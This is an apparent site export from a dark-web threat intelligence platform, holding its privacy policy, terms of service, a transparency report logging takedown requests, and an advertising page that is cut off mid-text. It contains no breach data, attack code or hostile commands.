# Dark Web Informer > Providing Cyber Threat Intelligence from the Dark Web & Clearnet: Breaches, Ransomware, Darknet Markets, Threat Alerts & more. Public Ghost content for AI and LLM tooling. This file includes a bounded export of public pages first, then recent public posts. Append `.md` to any post or page URL to get the content in Markdown (for example, `/example-post.md`). ## Pages ### Support URL: https://darkwebinformer.com/support/ Last updated: 2026-06-30T21:06:05.000Z _This page is for subscribers on the Elite tier only._ ### Privacy Policy URL: https://darkwebinformer.com/privacy-policy/ Last updated: 2026-06-09T18:03:49.000Z Effective 2026/06/09 # Privacy Policy Dark Web Informer - Cyber Threat Intelligence Platform Sections [01 Introduction](#s1) [02 Data Scope](#s2) [03 Information We Collect](#s3) [04 API Usage Data](#s4) [05 How We Use Your Info](#s5) [06 Legal Basis](#s6) [07 Sharing Your Info](#s7) [08 Business Transfers](#s8) [09 International Transfers](#s9) [10 Security](#s10) [11 Your Rights](#s11) [12 Breach Data Removal](#s12) [13 Third-Party Services](#s13) [14 Cookies & Storage](#s14) [15 Children's Privacy](#s15) [16 Screenshot Scanning](#s16) [17 Changes to Policy](#s17) 01 ## Introduction Dark Web Informer ("we," "our," "us") is committed to safeguarding your privacy. This Privacy Policy explains how we collect, use, store, and disclose your information when you access our website, API, or related services. By accessing or using Dark Web Informer, you acknowledge that you have read, understood, and agree to the practices described in this Privacy Policy. If you do not agree with the terms of this policy, please do not access our services. 02 ## Data Scope - Subscriber Data vs. Intelligence Data Important Distinction Please distinguish between two types of data processed by Dark Web Informer. This Privacy Policy applies differently to each. **Subscriber Data:** Information you provide to us to create an account, log in, and pay for services. This includes your name, email address, and payment information. This Privacy Policy fully applies to Subscriber Data. **Intelligence Data:** Information regarding ransomware victims, threat actors, data breaches, and leak sites displayed on our platform. This data is aggregated from publicly available sources on the Dark Web, Deep Web, and Surface Web. This Privacy Policy does not apply to Intelligence Data, which is provided for cybersecurity research purposes "as is." Dark Web Informer does not create, alter, or originate breach data and does not possess or control the systems from which such data originated. 03 ## Information We Collect Personal Information We may collect limited personal information, including: - Name - Email address - Email address for logging into DarkWebInformer.com - Email address for logging in through cryptocurrency-based payment systems Financial Data Financial information such as credit card numbers, card brands, and expiration dates is collected when you purchase a subscription. We do not store your full payment card details. All financial information is stored and processed by our third-party payment processor in accordance with their own privacy policy. Usage Data We may collect technical and transactional metadata automatically generated during account access and payment activity. This includes IP addresses, timestamps, device or browser details, and similar diagnostic information. Publicly Available Breach Data (Cyber Threat Intelligence) Dark Web Informer collects, analyzes, and republishes publicly available breach-related data from the Dark Web, Deep Web, and Surface Web. This information may include: Names, addresses, phone numbers, email addresses, usernames, passwords, financial details, government-issued IDs (including Social Security Numbers, passport numbers, and driver's license numbers), medical records, IP addresses, and corporate-sensitive data. This data is sourced from threat actor leak sites, forums, code repositories, and other publicly accessible platforms. It is collected exclusively for cybersecurity research, threat intelligence, and public awareness. Feed Personalization & Saved Configuration When you use the live threat feed, you may create configuration data such as keyword watchlists, saved searches and views, bookmarks, triage tags, and notification preferences and history. By default this information is stored locally in your browser (see Section 14) rather than transmitted to us, and you may export or re-import it as a settings file. Keyword watchlists can themselves reveal sensitive interests — for example, the name of your employer, your clients, or assets you monitor — so you should treat them accordingly. Automated Abuse-Prevention Signals To confirm that requests to the threat feed come from a human rather than an automated system, we use a human-verification challenge supplied by a third-party security provider. This challenge may process technical signals such as your IP address and device or browser characteristics, solely to distinguish legitimate users from bots. These signals are never used for advertising, marketing, or behavioral profiling. Consent Records We record your acceptance of this Privacy Policy and our Terms of Service, including the version accepted and the time of acceptance, so that we can demonstrate the basis on which you access the Services. 04 ## API Usage Data When you access our API services, we may automatically collect and store information such as: - IP address and approximate geographic region (for security and abuse prevention) - Endpoint requests, parameters, headers, and timestamps - API authentication data (API keys or tokens) - Error logs and diagnostic data - Rate-limit or security event details API usage data is used only for service operation, authentication, rate limit enforcement, abuse detection, debugging, security analysis, and internal analytics. Notice API usage data is never sold, rented, or shared for advertising purposes. 05 ## How We Use Your Information We use the collected information to: - Process transactions and provide payment confirmations through our payment processor - Communicate with users, including purchase notifications and service-related updates - Operate, maintain, and secure the website, platform, and API - Prevent abuse, fraud, and unauthorized access - Improve functionality, performance, and reliability of our services - Comply with applicable laws, court orders, and law enforcement requests 06 ## Legal Basis for Processing Where required by applicable laws (including GDPR and CCPA), we process personal information based on: - **Contractual necessity** \- for login, subscriptions, and API access - **Legitimate interests** \- cybersecurity research, threat intelligence, fraud prevention - **User consent** \- where explicitly required - **Legal compliance** \- to meet regulatory obligations Publicly available breach data is processed under legitimate interests for cybersecurity awareness, research, and threat monitoring. 07 ## Sharing Your Information Notice We do not sell or share your personal information with third parties for advertising, marketing, or unrelated services. We may disclose or process data through: - **Security and infrastructure providers** \- for security, caching, and DDoS protection. These providers may process IP addresses and technical logs solely for service operation. - **Payment processors** \- which collect and use payment details in accordance with their own privacy policies. Public breach-related content may be archived by third-party services. These services operate independently, and their handling of data is not governed by this Privacy Policy. Breach-related information is sourced from publicly available leaks and may be indexed by search engines, independent researchers, or cybersecurity organizations. 08 ## Business Transfers If Dark Web Informer reorganizes or sells all or a portion of its assets, undergoes a merger, or is acquired by another entity, we may transfer your information to the successor entity. In such an event, we will make reasonable efforts to notify affected users and ensure that the successor entity honors the commitments made in this Privacy Policy. 09 ## International Data Transfers Our servers and data processing operations may be located in multiple jurisdictions. By using the Service, you consent to the transfer of your data to jurisdictions where our infrastructure operates. For EU/EEA users, where data is transferred outside the EEA, we ensure appropriate safeguards are in place in accordance with GDPR requirements. 10 ## Security We take significant measures to protect user information from unauthorized access, disclosure, modification, or misuse. - API keys must be kept confidential by users and should be revoked immediately if compromised - We use encryption, rate limiting, anomaly detection, access controls, and monitoring to protect our systems - API usage logs are retained only as long as reasonably necessary, typically up to 12 months, unless extended for security investigations, abuse prevention, or legal requirements Disclaimer While we have taken reasonable steps to secure the personal information you provide to us, no security measures are perfect or impenetrable, and no method of data transmission can be guaranteed against any interception or other type of misuse. Users acknowledge that viewing breach-related content may expose sensitive information and agree to access such material at their own discretion and risk. 11 ## Your Data Protection Rights Depending on your location, you may have the following rights regarding your personal data: - **Right to Access** \- You have the right to request copies of your personal data - **Right to Rectification** \- You have the right to request that we correct any information you believe is inaccurate - **Right to Erasure ("Right to be Forgotten")** \- You have the right to request that we erase your personal data, under certain conditions - **Right to Restrict Processing** \- You have the right to request that we restrict the processing of your personal data - **Right to Object** \- You have the right to object to our processing of your personal data - **Right to Data Portability** \- You have the right to request transfer of your data to another organization, where applicable Users may also access and update their account login email, request the deletion of their user account (active subscriptions must complete their billing term before deletion), and opt out of emails where applicable. These rights apply to Subscriber Data only. They do not extend to Intelligence Data sourced from publicly available breaches. 12 ## Breach Data Removal Requests Dark Web Informer does not guarantee the removal of breach-related information that has already entered the public domain. Individuals or organizations may request redaction by submitting a formal takedown request as described in our [Transparency Report](https://darkwebinformer.com/transparency/). Requests must include legal documentation demonstrating ownership or direct association with the affected data. Requests to delete personal information do not apply to breach-related content sourced from public leaks, as we do not control the original source or its continued public availability. We reserve the right to deny takedown requests unless legally obligated to comply. 13 ## Third-Party Services To operate Dark Web Informer efficiently, we work with carefully selected third-party providers that assist with: - Content management and platform authentication - Secure payments and subscription management - Cryptocurrency transactions - Security, caching, and threat protection - Human verification and bot mitigation for the threat feed - Automated machine-reading (OCR) of breach-site screenshots to extract indicators These providers process data only as necessary to deliver their services and operate under their own privacy policies. Dark Web Informer does not use tracking scripts, marketing cookies, or behavioral advertising technologies. 14 ## Cookies, Local Storage & Notifications Dark Web Informer may use minimal cookies required for: - Authentication - Session management - Security - Basic functionality We do not use cookies for ad tracking, behavioral profiling, or cross-site tracking. We do not use analytics cookies, tracking pixels, or third-party marketing technologies. Local Browser Storage To make the threat feed usable, we store certain settings and data locally in your browser using local storage. This may include display preferences (such as theme, timezone, and layout), saved views, triage tags, bookmarks, keyword watchlists, notification preferences and notification history, last-visit and last-alert timestamps, your consent record, and a short-lived cache of recent results. This information remains on your device, is not used for tracking, and can be cleared at any time through your browser settings. Browser Notifications The live threat feed can display optional desktop or browser notifications for new alerts. These notifications require your explicit permission, which you grant through your browser and may revoke at any time. Notification content is shown only on your device, and enabling notifications is never required to use the Services. 15 ## Children's Privacy Dark Web Informer is not intended for use by individuals under the age of 18\. We do not knowingly solicit information from or market to children under the age of 18. If you become aware of any data we have collected from individuals under age 18, please contact us so that we can take appropriate action to remove such information immediately. 16 ## Screenshot Capture & Automated Scanning As part of our Intelligence Data, Dark Web Informer captures screenshots of publicly accessible threat actor sites, leak sites, forums, and related sources. Because these screenshots depict breach-related material, they may contain personal or sensitive information present at the original public source. On request, you may run an automated scan of a screenshot to extract potential indicators of compromise (such as URLs, onion addresses, IP addresses, and file hashes). This scan uses automated machine-reading (optical character recognition) performed on our own infrastructure or through our service providers. The image is processed solely to extract indicators and is not used for any unrelated purpose. This processing applies to Intelligence Data, not to Subscriber Data. As with all Intelligence Data, the original screenshots and any extracted text are sourced from publicly available material that we do not create, originate, or control. Disclaimer Automated text extraction is imperfect and may misread, omit, or incorrectly interpret content. Extracted indicators are provided for research purposes and should be independently verified before any action is taken. 17 ## Changes to This Privacy Policy We may update this Privacy Policy periodically. The most current version will always be available on our website, along with the last updated date. Continued use of the Services after any update constitutes acceptance of the updated policy. © 2026 Dark Web Informer. All rights reserved. ### Terms of Service URL: https://darkwebinformer.com/terms-of-service/ Last updated: 2026-07-18T01:59:16.000Z Effective 2026/07/17 # Terms of Service Dark Web Informer - Cyber Threat Intelligence Platform Sections [01 Introduction](#s1) [02 Services & Prohibited Use](#s2) [03 Pricing Tiers](#s3) [04 Payment Processing](#s4) [05 Billing & Refunds](#s5) [06 Service Availability](#s6) [07 User Conduct](#s7) [08 Account Security](#s8) [09 Intellectual Property](#s9) [10 Commercial Use](#s10) [11 Image Attribution](#s11) [12 Termination](#s12) [13 Disclaimers](#s13) [14 AI Content Disclaimer](#s14) [15 Malware & External Links](#s15) [16 Limitation of Liability](#s16) [17 Indemnification](#s17) [18 Force Majeure](#s18) [19 Governing Law](#s19) [20 Changes to Terms](#s20) [21 Legal Requests](#s21) [22 Archiving & External](#s22) [23 Advertising](#s23) [24 PII & Data Exposure](#s24) [25 API Access](#s25) [26 Cookies & Tracking](#s26) [27 Feed & Notifications](#s27) [28 Data Exports](#s28) [29 Screenshot Scanning](#s29) 01 ## Introduction Welcome to Dark Web Informer. These Terms of Service ("Terms") govern your access to and use of our website, API, and related services. By accessing or using our services, you agree to be bound by these Terms. By using Dark Web Informer, you acknowledge that we process publicly available breach data under legitimate interests for cybersecurity research, threat intelligence, and public awareness. 02 ## Services & Prohibited Use Dark Web Informer is a platform that provides Cyber Threat Intelligence (CTI) sourced from publicly available Dark Web, Deep Web, and Surface Web locations. This includes information related to ransomware activity, darknet markets, threat alerts, data breaches, leaks, and similar cybersecurity threats. You agree not to use Dark Web Informer for any unlawful, unethical, or malicious purposes, including but not limited to: - Engaging in, promoting, or supporting any form of illegal activity, including hacking, fraud, or identity theft - Distributing, sharing, or selling personal or sensitive information obtained from our Services without the explicit consent of the affected individuals - Using information obtained from our Services to harass, stalk, threaten, or intimidate any individual or entity - Exploiting vulnerabilities, attempting unauthorized access, or disrupting the operation of our Services or any third-party systems - Violating the privacy or intellectual property rights of any individual or entity - Using our Services in a way that harms, disrupts, or damages our reputation or the reputation of associated third parties - Facilitating extortion, blackmail, "double extortion," or assisting threat actors in any way - Contacting ransomware victims or threat actors listed on the Service for solicitation or harassment - Using data to facilitate payments to sanctioned entities (e.g., OFAC, EU Sanctions lists) - Using bots, scrapers, spiders, or automated scripts to harvest data in bulk 03 ## Pricing Tiers & Benefits Dark Web Informer offers multiple pricing tiers with various benefits. These tiers and the included features may change at any time without prior notice. We reserve the right to modify or discontinue specific features or services at our discretion. Continued use of the Services after such changes constitutes acceptance of the revised tier structure. 04 ## Payment Processing All payments are processed by trusted third-party payment processors. By using our services, you agree to comply with their respective terms and policies. If your subscription includes API access, continued use requires an active, paid subscription. Expired or unpaid subscriptions will lose access. You authorize Dark Web Informer to charge your payment method for the amount specified during purchase. 05 ## Billing, Refunds & Invoices Important All sales are final and non-refundable. Payments for subscriptions are non-refundable. If you cancel your subscription, you will retain access until the end of the current billing cycle. By subscribing, you acknowledge that you waive your right of withdrawal once the digital content/service has begun performance. If your account is suspended or terminated due to a violation of these Terms, access to paid Services will end immediately without refunds. Invoices are final at the time of generation and cannot be modified or reissued. Customers are responsible for verifying all billing details before completing purchases. All fees are exclusive of taxes, levies, or duties imposed by taxing authorities. You are responsible for payment of all applicable taxes. 06 ## Service Availability We strive to maintain continuous, reliable service. However, we cannot guarantee uninterrupted or error-free operation. Services may be unavailable due to maintenance, updates, or events outside our control. We do not provide service level agreements, credits, or refunds for downtime, delays, or performance issues. 07 ## User Conduct You agree to use our Services only for lawful purposes. You are responsible for all actions taken under your account, including API activity. Attempts to evade bans, suspensions, or account restrictions are prohibited. 08 ## Account Security **Single User Accounts:** Accounts are for individual use only. Sharing login credentials (username/password) with third parties or multiple users within an organization without a specific enterprise license is strictly prohibited. **Monitoring:** We reserve the right to monitor account activity for concurrent logins or abnormal usage patterns. Detected violations may result in immediate termination without refund. **Credential Compromise:** You are responsible for maintaining the confidentiality of your account credentials. If you believe your account has been compromised, you must notify us immediately. 09 ## Intellectual Property All content on Dark Web Informer, including text, software, graphics, images, screenshots, threat intelligence data, curated analysis, and visual media, is protected by intellectual property laws and remains the exclusive property of Dark Web Informer unless otherwise stated. Unauthorized reproduction, redistribution, or commercial use of any content is strictly prohibited and may result in legal consequences. Partnerships or licensing agreements are available upon request by contacting Dark Web Informer directly. 10 ## Commercial Use All content published by Dark Web Informer is intended for personal, non-commercial use only unless explicitly authorized. Commercial Use Defined Commercial use includes, but is not limited to: - Incorporating Dark Web Informer content into paid products, reports, or services - Using content in marketing materials, advertisements, or promotional campaigns - Redistributing, syndicating, or reselling content to third parties - Using content to build, train, or improve competing threat intelligence platforms, datasets, or services - Embedding content in commercial dashboards, tools, or SaaS products - Reproducing content in paid newsletters, research reports, or subscription-based publications How to Obtain Commercial Access Organizations or individuals seeking to use Dark Web Informer content for commercial purposes must either subscribe to an API plan (see Section 25) or contact Dark Web Informer directly to discuss a licensing or partnership agreement. Warning Unauthorized commercial use may result in immediate termination of access, legal action, and claims for damages. 11 ## Image & Media Attribution All images, screenshots, graphics, and visual media published by Dark Web Informer are protected under applicable intellectual property laws. Attribution Requirements Any use of images or visual media sourced from Dark Web Informer must include clear and visible attribution. Acceptable formats include: - "Source: Dark Web Informer" - "Credit: Dark Web Informer" - A direct link to the original article or page - "Image via darkwebinformer.com" - "Courtesy of Dark Web Informer" Attribution must not be hidden, obscured, cropped out, or removed. Watermarks applied by Dark Web Informer must not be altered, removed, or covered. Prohibited Uses of Images - Use images or screenshots for any commercial purpose without written permission - Modify, alter, or create derivative works from Dark Web Informer images - Remove, crop, or obscure watermarks or attribution - Claim ownership of or misrepresent the origin of images - Redistribute images in bulk or as part of a dataset or archive 12 ## Termination We reserve the right to suspend or terminate access to our Services at any time, with or without notice, if we believe you have violated these Terms or our payment provider's terms. We may also report activities that violate these Terms to relevant law enforcement agencies. Accounts that remain inactive for 30 consecutive days may be deleted, unless the account has an active subscription. 13 ## Disclaimer of Warranties Disclaimer Our Services are provided "AS IS" and "AS AVAILABLE," without warranties of any kind, express or implied. We do not guarantee accuracy, completeness, reliability, or fitness for a particular purpose. Dark Web Informer makes no representations or warranties regarding the accuracy, reliability, or completeness of any data provided. 14 ## AI-Generated Content Disclaimer Portions of the content on Dark Web Informer, including summaries, analysis, and classifications, may be generated or assisted by Artificial Intelligence. AI can produce inaccuracies, errors, or "hallucinations." You should independently verify all critical information before taking action based on content provided through our Services. Dark Web Informer is not responsible for decisions made based on AI-generated content. This includes automated text extraction (optical character recognition, or “OCR”) used to read screenshots and pull indicators of compromise from them. OCR can misread, omit, or misclassify characters and content, and any extracted indicators must be independently verified before you rely on or act upon them. 15 ## Malware Risk & External Links The Service may contain links, references, or URLs to external sites hosted by threat actors, including dark web leak sites, forums, and marketplaces. Accessing such external links is done entirely at your own risk. Dark Web Informer is not responsible for any malware, viruses, exploits, phishing attempts, or other security threats encountered on third-party sites referenced within our content. 16 ## Limitation of Liability To the fullest extent permitted by applicable law, Dark Web Informer shall not be liable for any indirect, incidental, special, consequential, or punitive damages arising from use of the website, API, or related services, including but not limited to loss of profits, data, use, goodwill, or other intangible losses. Liability Cap In no event shall the aggregate liability of Dark Web Informer exceed the greater of one hundred U.S. dollars ($100.00) or the amount you paid to Dark Web Informer in the past three (3) months. 17 ## Indemnification You agree to defend, indemnify, and hold harmless Dark Web Informer and its officers, directors, employees, and agents from and against any and all claims, damages, obligations, losses, liabilities, costs, and expenses (including attorney's fees) arising from: (i) your use of the Service; (ii) your violation of these Terms; or (iii) your violation of any third-party right or applicable law. 18 ## Force Majeure Dark Web Informer shall not be liable for any failure to perform its obligations where such failure results from any cause beyond reasonable control, including, without limitation, mechanical, electronic or communications failure or degradation, denial of service attacks (DDoS), other cyber-attacks, natural disasters, acts of government, pandemic, or civil unrest. 19 ## Governing Law These Terms are governed by applicable laws. By using the Services, you agree that any disputes will be resolved through appropriate legal channels. 20 ## Changes to Terms We may update these Terms periodically. The most current version will always be available on our website. We will provide notice of material changes via the website or email. Continued use of the Services after changes constitutes acceptance of the revised Terms. 21 ## Legal Requests & Transparency Dark Web Informer maintains a [Transparency Report](https://darkwebinformer.com/transparency/) documenting legal requests and actions taken. Takedown requests must meet the requirements outlined in that Report. Requests lacking legal documentation may be denied. We are not responsible for the availability of archived or externally preserved public data. 22 ## Archiving & External Services Dark Web Informer may use third-party services to preserve and display publicly available breach data. These services operate independently, and their data handling is not governed by our Terms. We also route traffic through third-party security and infrastructure providers for caching, DDoS protection, and threat mitigation. These providers may process IP addresses and technical metadata solely for service operation. Leaked data may remain accessible through independent sources beyond our control. 23 ## Advertising & Sponsored Content Advertisers must comply with all applicable laws and cannot include misleading, fraudulent, or illegal content. Tracking scripts, cookies, and user data collection by advertisers are prohibited. We reserve the right to remove or modify advertisements without notice. Advertisers assume full responsibility for their content. Dark Web Informer is not liable for interactions with advertised services. 24 ## Public Exposure of Data & PII Dark Web Informer republishes unredacted breach-related data sourced exclusively from publicly available Dark Web, Deep Web, and Surface Web locations. This information may include names, addresses, phone numbers, email addresses, usernames, passwords, financial information, government-issued IDs, medical records, IP addresses, and sensitive corporate data. Dark Web Informer does not create, originate, or alter breach data. We do not control the systems or sources from which the data was leaked. This data is republished for cybersecurity research, defense awareness, and public interest. If your jurisdiction restricts access to leaked or exposed data, you are responsible for compliance with your local laws. Data Removal Requests You may submit a formal takedown request through our [Transparency Report](https://darkwebinformer.com/transparency/), but removal is not guaranteed. Requests must include valid legal documentation proving ownership or direct association with the data. Requests to delete personal information do not apply to publicly leaked breach data, as we do not control its origin or continued availability. 25 ## API Access & Usage If you access the API, the following additional terms apply: Authentication API keys must be kept confidential. You are responsible for all activity conducted under your key. If a key is compromised, you must notify us immediately. Permitted Use The API may be used only for lawful purposes and in compliance with these Terms. You may use API data within your own internal tools, dashboards, workflows, or security systems. You may not: - Resell, sublicense, republish, or redistribute Dark Web Informer's API data to any third party - Use the API to create a competing public API or commercial service based primarily on Dark Web Informer's output - Attempt to bypass authentication, rate limits, or access controls - Engage in abusive behavior such as scraping, flooding, or denial-of-service activity Rate Limits We may impose quotas, data caps, or other controls to protect service stability. Exceeding limits may result in throttling or temporary or permanent suspension. Termination We reserve the right to revoke or suspend API access at any time if misuse or abuse is suspected. No refunds or credits will be provided for terminations caused by violations. Data Disclaimer All API data, including breach-related content, is provided "as is" for cybersecurity awareness and research only. No warranties are provided regarding accuracy, completeness, or reliability. 26 ## Cookies & Tracking Dark Web Informer uses only essential cookies required for login, session management, basic functionality, and security. We do not use advertising cookies, tracking pixels, behavioral analytics, or third-party marketing technologies. 27 ## Real-Time Feed, Alerts & Notifications The Service includes a real-time threat feed that streams new records and may deliver in-app, desktop, or browser alerts and notifications. This feed is provided on a best-effort basis. We do not guarantee the timeliness, ordering, completeness, or delivery of any feed item or notification. Records may arrive late, out of order, be temporarily duplicated, or be missed entirely, and notifications may fail to fire for reasons inside or outside our control. The feed and its alerts must not be relied upon as your sole or primary means of detecting threats, and must not be used as an emergency, safety-critical, or life-safety alerting system. You are responsible for configuring and maintaining your own keyword watchlists, filters, and notification preferences, and for independently monitoring sources relevant to you. We may modify, throttle, pause, or discontinue the real-time feed or any notification feature at any time without notice. 28 ## Data Exports The Service may allow you to export filtered results and visualizations in formats such as CSV, JSON, XML, image files, and other machine-readable or structured intelligence formats. Exports are subject to operational limits that we set and may change at any time, including requirements such as an active search or filter, per-export record caps, and daily export caps. Exported data remains Dark Web Informer content and continues to be governed by these Terms, including Section 10 (Commercial Use) and Section 25 (API Access & Usage). Without separate written authorization, you may not resell, sublicense, republish, redistribute, or syndicate exported data, nor use it to build, train, or improve a competing dataset, feed, product, or service. - Circumventing, automating around, or attempting to defeat export limits, caps, or required filters - Aggregating repeated exports to assemble a bulk copy of our data or a substantial portion of it - Removing or altering any attribution or watermark contained in exported images (see Section 11) 29 ## Screenshot & Image Scanning The Service may display screenshots captured from publicly accessible threat actor sites, leak sites, and forums, and may offer an optional, on-demand scan that uses automated machine-reading (OCR) to extract potential indicators of compromise from those screenshots. Screenshots and the scanning feature are provided "AS IS." Automated extraction is imperfect and may misread, omit, or misclassify content, and any extracted indicators must be independently verified before you rely on or act upon them. Screenshots may contain offensive, unlawful, or sensitive material, personal information, or references to malicious infrastructure; you access and scan such content at your own risk (see Section 15). You may not use the scanning feature or any extracted output in violation of Section 2 (Services & Prohibited Use), Section 10 (Commercial Use), or Section 28 (Data Exports). © 2026 Dark Web Informer. All rights reserved. ### Darknet Markets URL: https://darkwebinformer.com/darknet-markets/ Last updated: 2025-09-04T22:28:46.000Z _No content available._ ### Data Breaches URL: https://darkwebinformer.com/data-breaches/ Last updated: 2025-09-04T21:44:34.000Z _This page is for subscribers on the Plus, Pro and Elite tiers only._ ### DDoS Attacks URL: https://darkwebinformer.com/ddos-attacks/ Last updated: 2025-09-04T21:44:34.000Z _This page is for subscribers on the Plus, Pro and Elite tiers only._ ### News URL: https://darkwebinformer.com/news/ Last updated: 2025-09-04T22:28:45.000Z _No content available._ ### Subscribers URL: https://darkwebinformer.com/onions/ Last updated: 2024-08-02T21:29:00.000Z _This page is for subscribers on the Plus, Pro and Elite tiers only._ ### Ransomware URL: https://darkwebinformer.com/ransomware/ Last updated: 2025-09-04T21:44:33.000Z _This page is for subscribers on the Pro and Elite tiers only._ ### Vulnerabilities URL: https://darkwebinformer.com/vulnerabilities/ Last updated: 2025-09-04T22:28:45.000Z _No content available._ ### OSINT URL: https://darkwebinformer.com/osint/ Last updated: 2025-09-04T22:28:45.000Z Open Source Intelligence (OSINT) refers to the practice of collecting and analyzing publicly available information from various sources to produce actionable intelligence. This data can come from a variety of mediums including online publications, social media platforms, government reports, news articles, and other publicly accessible documents. OSINT is widely used in fields such as cybersecurity, law enforcement, military intelligence, and competitive business analysis to gather insights without needing covert or clandestine methods. ### Leaks URL: https://darkwebinformer.com/leaks/ Last updated: 2025-09-04T21:44:31.000Z _This page is for subscribers on the Plus, Pro and Elite tiers only._ ### Transparency Report URL: https://darkwebinformer.com/transparency/ Last updated: 2026-07-15T22:59:45.000Z Live This report is updated in real time as approvals and denials are issued. Public record # Transparency Report Every legal takedown request and legal-process notice received by Dark Web Informer is logged here, who asked, what they asked for, and the outcome. Nothing is removed silently. Effective08 Sep 2025 Updated05 Jul 2026 [Request log](#trp-log) [Submit a request](#trp-requirements) [Policies](#trp-policies) [Appeals](#trp-appeals) 0Total requests 0Approved 0Denied 0Government 0Private 0% Compliance §01 ## Logged Legal Requests All Approved Denied ### BLS International 11 May 2026 · ![India flag](https://flagcdn.com/16x12/in.png) India · Private entity Approved Website[blsinternational.com](https://blsinternational.com) Referencehttps://x.com/darkwebinformer/status/2053191705877217526 Removed fromX ReasonPost no longer exists on the forum BF ### Al Tamimi & Company on behalf of Salama 7 May 2026 · ![UAE flag](https://flagcdn.com/16x12/ae.png) UAE · Private entity Approved Website[salama.ae](https://salama.ae) Referencehttps://x.com/DarkWebInformer/status/2048088351488508313 Removed fromX ReasonLegal request submitted by authorized representative on behalf of Salama ### Herbies Seeds 30 May 2025 · ![United Kingdom flag](https://flagcdn.com/16x12/gb.png) United Kingdom · Private entity Approved Website[herbiesheadshop.com](https://herbiesheadshop.com) Reference/alleged-data-breach-of-herbies-seeds/ Removed fromDWI, X, LinkedIn ReasonPost no longer exists on the forum DF ### Credique, LLC 18 Dec 2024 · ![USA flag](https://flagcdn.com/16x12/us.png) USA · Private entity Denied Website[credique.com](https://credique.com) Reference/a-threat-actor-is-allegedly-selling-the-data-of-credique-llc/ Removed from\- ReasonMissing required information. See Denial Reporting Policy below for appeal. ### More Than Gifts 13 Nov 2024 · ![Netherlands flag](https://flagcdn.com/16x12/nl.png) Netherlands · Private entity Approved Website[morethangifts.nl](https://www.morethangifts.nl) Reference/a-threat-actor-has-allegedly-leaked-the-data-of-more-than-gifts/ Removed fromDWI, X, Telegram, Infosec Exchange, LinkedIn ReasonPost no longer exists on the forum BF No entries match your filters. Clear filters §02 ## Takedown Request Requirements A valid request must include all four parts below. Incomplete requests are denied, and the denial is logged. ### 1 / 4Requester Details - Full name - Official email (organization domain) - Phone number - Organization name - Role or position with authority - Proof of identity or affiliation ### 2 / 4Content Details - Direct URL of the content - Brief description of the content - Date published (if known) ### 3 / 4Legal Basis - Grounds for removal (copyright, privacy, post no longer exists) - Explanation of the violation - Supporting evidence (screenshots, legal documents) - Potential harm if not removed ### 4 / 4Final Declaration - Truthfulness confirmation - Legal acknowledgment - Transparency agreement (requests logged publicly) - Digital signature (typed name or checkbox) Requests to remove publicly available personal information are evaluated case by case. Content sourced from public records is not removed unless a compelling legal reason is provided. Allow 2 business days for review. Submit requests to `legal [at] darkwebinformer [dot] com` Copy address Non-legal requests will be ignored. §03 ## Legal Requests & Law Enforcement - Government, law-enforcement, and platform legal-process notices are reviewed for authenticity, scope, and legal validity before any action is taken. - Requests must come from a verified official channel, identify the specific content or account, cite the applicable legal authority, and clearly describe the information or action requested. - Incomplete, unauthenticated, overbroad, abusive, or complaint-driven requests may be denied, challenged, narrowed, or ignored. - Dark Web Informer does not disclose user, subscriber, source, or account-identifying information unless required by valid and enforceable legal process. - Security research and journalistic reporting on alleged third-party cyber claims is not treated as unlawful solely because a subject disputes or dislikes the reporting. §04 ## Policy on Transparency - We publish the requesting entity, country, website, outcome, removed URL, platforms removed from, and the provided reason. - Government and law-enforcement notices sent directly to Dark Web Informer may be included when legally permitted. Platform notices about third-party services may be logged separately when action is taken or disclosed. - We do not host or store non-public data. Information is sourced from publicly available records. - No hacking, unauthorized access, or paid acquisition is used for reporting. §05 ## Handling False Legal Claims - Misuse of DMCA or legal claims intended to suppress public information is logged and may be reported. - Repeated abuse may result in public disclosure of the fraudulent request. - Knowingly filing false or unethical complaints may violate the law and can result in legal liability. - Requests outside of legal matters will not be addressed. §06 ## Internet Archive & Third-Party Archiving - Public pages may be archived by third-party services such as the Wayback Machine. - If content is removed here, it may continue to exist in external archives. - Requesters must contact the respective third-party service for removal. §07 ## Denial Reporting Policy & Appeals If a takedown request is denied, the public log will include the requesting entity, denial reason, and additional notes. Denials are updated within 5 business days of the final decision. ### AppealAppealing a Denial - **Updated or additional information** \- new evidence or missing documentation - **Detailed explanation** \- why the decision should be reconsidered, citing legal grounds - **Appeal submission** \- email `legal [at] darkwebinformer [dot] com` with subject line: *Appeal: \[Your Organization/Request Name\]* **Important:** Appeals are reviewed only if substantial new evidence or legitimate legal grounds are provided. Repetitive or baseless appeals may be ignored and legal action may be taken. Appeals are reviewed within 5 business days. If approved, the denial entry is replaced with the updated request status. Dark Web Informer is committed to public transparency and cybersecurity awareness. All information published is sourced from publicly available data. ### Defacements URL: https://darkwebinformer.com/defacements/ Last updated: 2024-07-20T01:22:14.000Z _This page is for subscribers on the Plus, Pro and Elite tiers only._ ### Crypto Payments URL: https://darkwebinformer.com/crypto-payments/ Last updated: 2026-02-09T00:58:12.000Z _No content available._ ### Resources URL: https://darkwebinformer.com/resources/ Last updated: 2025-09-04T22:28:44.000Z _No content available._ ### Stats URL: https://darkwebinformer.com/stats/ Last updated: 2025-09-04T21:44:28.000Z _This page is for subscribers on the Plus, Pro and Elite tiers only._ ### Subscriber Benefits URL: https://darkwebinformer.com/subscriber-benefits/ Last updated: 2025-09-04T21:44:27.000Z _This page is for subscribers on the Plus, Pro and Elite tiers only._ ### Advertising URL: https://darkwebinformer.com/advertising/ Last updated: 2026-09-10T19:40:46.000Z Dark Web Informer [Packages](#options) [Analytics](#analytics) [Contact](#contact) Advertising Partnerships # Your brand, in front of the right audience On-site banner ads and social promotion across 223K+ followers. Simple, effective, visible. [Start advertising →](#contact) [View analytics](#analytics) // Packages ## Advertising Options Flexible packages to match your goals. Banner placements, sponsored content, and cross-platform social amplification. ◧ ### Banner Ads High visibility on key pages and posts. Header Ads 3 available $700/mo Footer Ads 2 available $300/mo Twitter / X 234.1K followers Last updated: August 29, 2026 · Next update: September 29, 2026 [Start advertising →](#contact) // Analytics ## Performance Snapshots Website traffic from the last 7 and 30 days. Need something more granular? Just ask. [ ![Website stats – last 7 days](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1000/2026/08/7d.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1000/2026/08/7d.png) Website – Last 7 Days August 29, 2026 · Next update: September 29, 2026 [ ![Website stats – last 30 